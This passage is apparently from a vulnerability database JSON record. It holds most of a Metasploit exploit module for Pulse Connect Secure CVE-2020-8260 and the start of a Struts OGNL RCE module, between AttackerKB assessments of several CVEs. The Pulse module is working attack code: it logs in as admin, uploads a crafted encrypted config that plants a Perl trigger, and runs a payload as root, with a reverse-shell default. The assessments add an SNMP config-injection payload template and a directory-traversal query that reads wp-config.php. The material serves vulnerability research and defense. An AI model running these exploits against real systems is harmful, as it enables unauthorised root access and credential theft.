resulting in Remote Code Execution as root.\n Admin credentials are required for successful exploitation.\n Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n },\n 'Author' => [\n 'h00die', # msf module\n 'Spencer McIntyre', # msf module\n 'Richard Warren <richard.warren@nccgroup.com>', # original PoC, discovery\n 'David Cash <david.cash@nccgroup.com>', # original PoC, discovery\n ],\n 'References' => [\n ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'],\n ['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'],\n ['CVE', '2020-8260']\n ],\n 'DisclosureDate' => '2020-10-26',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix In-Memory',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }\n }\n ]\n ],\n 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } },\n 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' },\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],\n 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure']\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the application', '/']),\n OptString.new('USERNAME', [true, 'The username to login with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to login with', '123456'])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]),\n ])\n end\n\n def check(exploiting: false)\n login\n res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') })\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200\n version = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version\n version, build = version\n\n return CheckCode::Unknown unless version.include?('R')\n\n version, revision = version.split('R', 2)\n print_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\")\n return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9\n\n CheckCode::Detected\n rescue Msf::Exploit::Failed\n CheckCode::Unknown\n ensure\n logout unless exploiting\n end\n\n def exploit\n case (checkcode = check(exploiting: true))\n when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears\n print_good(checkcode.message)\n when Exploit::CheckCode::Detected\n print_warning(checkcode.message)\n else\n fail_with(Module::Failure::Unknown, checkcode.message.to_s)\n end\n\n case target['Type']\n when :unix_memory\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(\n linemax: 262144, # 256KiB\n delay: datastore['CMDSTAGER::DELAY']\n )\n end\n\n logout\n end\n\n def execute_command(command, _opts = {})\n trigger = Rex::Text.rand_text_alpha_upper(8)\n print_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\")\n\n config = build_malicious_config(command, trigger)\n res = upload_config(config)\n\n fail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200\n\n print_status('Triggering RCE')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'),\n 'headers' => { trigger => trigger }\n })\n end\n\n def res_get_xsauth(res)\n res.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first\n end\n\n def upload_config(config)\n print_status('Requesting backup config page')\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'),\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'vars_get' => { 'type' => 'system' }\n })\n fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil?\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"')\n post_data.add_part('Import', nil, nil, 'form-data; name=\"op\"')\n post_data.add_part('system', nil, nil, 'form-data; name=\"type\"')\n post_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"')\n post_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"')\n post_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"')\n post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"')\n\n print_status('Uploading encrypted config backup')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'),\n 'method' => 'POST',\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n })\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'tz_offset' => '-300',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'realm' => 'Admin Users',\n 'btnSubmit' => 'Sign In'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302\n location = res.headers['Location']\n fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')\n\n return unless location.include?('admin%2Dconfirm')\n\n # if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it.\n print_status('Other admin sessions detected, continuing')\n res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'btnContinue' => 'Continue the session',\n 'FormDataStr' => fds.first,\n 'xsauth' => xsauth\n },\n 'keep_cookies' => true\n })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res\n end\n\n def logout\n print_status('Logging out to prevent warnings to other admins')\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200\n\n logout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first\n fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil?\n\n res = send_request_cgi({ 'uri' => logout_uri })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302\n end\n\n def build_malicious_config(cmd, trigger)\n payload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\"\n perl = <<~PERL\n if (length $ENV{HTTP_#{trigger}}){\n chmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\";\n system(\"env /data/var/runtime/tmp/tt/#{payload_script}\");\n }\n PERL\n tarfile = StringIO.new\n Rex::Tar::Writer.new(tarfile) do |tar|\n tar.mkdir('tmp', 509)\n tar.mkdir('tmp/tt', 509)\n tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|\n tio.write perl\n end\n tar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio|\n tio.write \"PATH=/home/bin:$PATH\\n\"\n tio.write \"rm -- \\\"$0\\\"\\n\"\n tio.write cmd\n end\n end\n\n gzfile = StringIO.new\n gz = Zlib::GzipWriter.new(gzfile)\n gz.write(tarfile.string)\n gz.close\n\n encrypt_config(gzfile.string)\n end\n\n def encrypt_config(config_blob)\n cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt\n iv = cipher.iv = cipher.random_iv\n cipher.key = ENCRYPTION_KEY\n\n md5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\")\n\n ciphertext = cipher.update(config_blob)\n ciphertext << cipher.final\n md5 << ciphertext\n\n cipher.reset\n \"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\"\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/pulse_secure_gzip_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2021-07-20T23:33:10", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 \u2013 Struts 2.5.25.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2020 6:53pm UTC reported:\n\nSee my [assessment](<https://attackerkb.com/assessments/92642728-1fa2-4a4e-9750-297f18f0cc0b>) on [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230>). [Apache themselves](<https://cwiki.apache.org/confluence/display/WW/S2-061>) said this is similar to [S2-059](<https://cwiki.apache.org/confluence/display/WW/S2-059>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-15T00:00:00", "id": "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "href": "https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:10:30", "description": "The easy-wp-smtp plugin before 1.4.4 for WordPress allows Administrator account takeover, as exploited in the wild in December 2020. If an attacker can list the wp-content/plugins/easy-wp-smtp/ directory, then they can discover a log file (such as #############_debug_log.txt) that contains all password-reset links. The attacker can request a reset of the Administrator password and then use a link found there.\n\n \n**Recent assessments:** \n \n**h00die** at January 18, 2021 3:11pm UTC reported:\n\nThis is a rather neat vulnerability IMO.\n\nEasy WP SMTP versions &lt;= 1.4.2 has a non-default `debug` option. When set, the WordPress plugin creates a `[a-z0-9]{5,15}_debug_log.txt` file in the `wp-content/plugins/easy-wp-smtp/` directory. Problem is, this folder allows directory listings, so the file can easily be accessed. The debug log file contains SMTP logs for the Wordpress instance.\n\nAttack chain is as follows:\n\n 1. find the debug_log file \n\n 2. request a password reset for an account \n\n 3. read the debug_log file which will have the password reset link for that user \n\n 4. use the link to change the password for that user. \n\n\nPretty easy to exploit, but but not necessarily in an automated way since the password change may have unknown requirements. Easy to do manually though!\n\nThe file may also contain creds for the SMTP server!\n\n<https://github.com/rapid7/metasploit-framework/pull/14474>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-12-14T00:00:00", "type": "attackerkb", "title": "CVE-2020-35234", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35234"], "modified": "2020-12-16T00:00:00", "id": "AKB:A93881E2-CFB7-49E3-81CF-664913BEA12E", "href": "https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:07:45", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.\n\n \n**Recent assessments:** \n \n**kevthehermit** at April 14, 2020 2:38pm UTC reported:\n\nThis plugin is recorded as having over 1 Million installations via Wordpress \u2013 <https://wordpress.org/plugins/duplicator/> \nIt has a free and a pro version with both being impacted.\n\nOther reporting suggests that there are around 170,000 active installations. with ~ 150,000 of these not on the latest version.\n\nThe vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack _can_ lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.\n\nThis exploit has been seen in active campaigns as reported by wordfence \u2013 <https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/>\n\nIOC\u2019s Shared by wordpress and replicated here for ease of discovery.\n\nIndicators Of Compromise (IOCs) \nThe following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.\n\nTraffic logged from the threat actor\u2019s IP address should be considered suspicious:\n\n * 77.71.115.52 \n\n * Attacks in this campaign are issued via GET requests with the following query strings: \n\n * action=duplicator_download \n\n * file=/../wp-config.php \n\n * Note: Because this vulnerability can be exploited via WP AJAX, it\u2019s possible to exploit via POST request. In this case, it\u2019s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2020-11738", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2020-06-05T00:00:00", "id": "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "href": "https://attackerkb.com/topics/judia21wRt/cve-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T15:07:02", "description": "A vulnerability in the Pulse Connect Secure &lt; 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T00:00:00", "type": "attackerkb", "title": "CVE-2020-8260", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2020-10-31T00:00:00", "id": "AKB:EE68C1DD-4843-420D-B126-5C0A7277EFD4", "href": "https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:14", "description": "An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server.\n\n \n**Recent assessments:** \n \n**cdelafuente-r7** at November 03, 2020 6:26pm UTC reported:\n\nSpamTitan Gateway is an anti-spam appliance that protects against unwanted emails and malwares. Versions 7.01, 7.02, 7.03 and 7.07 are vulnerable to Remote Code Execution as `root` due to improper input sanitization. Note that only version 7.03 needs authentication and no authentication is required for versions 7.01, 7.02 and 7.07.\n\nThe attack consists in abusing the SpamTitan Gateway UI `SNMP Management Settings` feature to inject dangerous `SNMPD` command directives into the SNMP server configuration file. This is can be done in two steps:\n\n 1. Send an HTTP POST request to the `snmp-x.php` page with a specially crafted `community` parameter: \n`...[SNIP]...&community=<community>\" <ip>\\nextend <random name> <payload>`. \nThis will end up being added to `snmp.conf` like this: \n`\u2026[SNIP]...` \n`rocommunity \"<community>\" <ip>` \n`extend <random name> <payload>` \n`\u2026[SNIP]...` \n\n 2. Send an SNMP `Get-Request` to correct OID to trigger the payload. \n\n\nSince a [proof o concept](<https://www.exploit-db.com/exploits/48856>) and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14330>) are available, it is highly recommended to upgrade to the latest available version.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-11698", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11698"], "modified": "2020-09-25T00:00:00", "id": "AKB:EADBBBBE-8A57-469F-A96F-22A14761BCF0", "href": "https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-06T05:26:06", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{\u2026} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "id": "AKB:CB02764B-566F-4540-ACA2-C9DDEE8D1496", "href": "https://attackerkb.com/topics/v2k6fAErDS/cve-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T17:28:07", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2020-11-17T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-08-09T12:46:53", "description": "The Apache Struts framework, when forced, performs double evaluation of attribute values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to remote code execution. This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T00:00:00", "type": "zdt", "title": "Apache Struts 2 Forced Multi OGNL Evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "1337DAY-ID-35571", "href": "https://0day.today/exploit/description/35571", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags\n attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a\n tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).\n\n This vulnerability is application dependant. A server side template must make an affected use of request data to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => 